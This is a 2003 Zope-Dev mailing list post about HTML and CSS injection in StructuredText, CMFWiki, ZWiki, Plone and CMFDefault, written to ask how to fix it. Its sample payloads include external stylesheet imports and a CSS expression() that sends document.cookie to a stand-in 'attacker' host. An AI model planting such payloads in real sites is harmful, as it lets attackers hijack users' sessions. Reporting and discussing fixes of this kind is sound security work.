On Mon, 23 Jun 2003 01:20:35 -0700 Jamie Heilman <[EMAIL PROTECTED]> wrote:
> http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt [snip] > apps, and apart from 1 and 3 there are probably legitimate bugs there. related issues: CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a, as far as the site permits to anonymous users or person without good references to write. To cope with the matter, I stupidly put multiple string substitution. t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t) t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t) t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t) It would be appreciated if someone advices me more general and smart way. I know that Zope's StructuredText itself does not handle such a case, and that kind of implementaition may be left to each developer. If it had ability to avoid them, it would be much better, I think. Another example Following sample may allow malicious.css import from outside of the site. Put #1 or #2 to a StructuredText page. #1 <LINK rel="stylesheet" href="http://attacker/malicious.css"> #2 <STYLE type="text/css"> @import url('http://attacker/malicious.css'); </STYLE> # expample of malicious.css http://attacker/malicious.css body { left: expression(eval( 'document.location="http://attacker/"+document.cookie;')) } For example, make a 'Document' in a CMFDefault site, and put #1 to the reply form, DiscussionItem, against the original document, etc. It seems CMFDefault is vulnerable to this attack. Any general remedy for that kind of exploit? -- Kazuya Fukamachi _______________________________________________ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )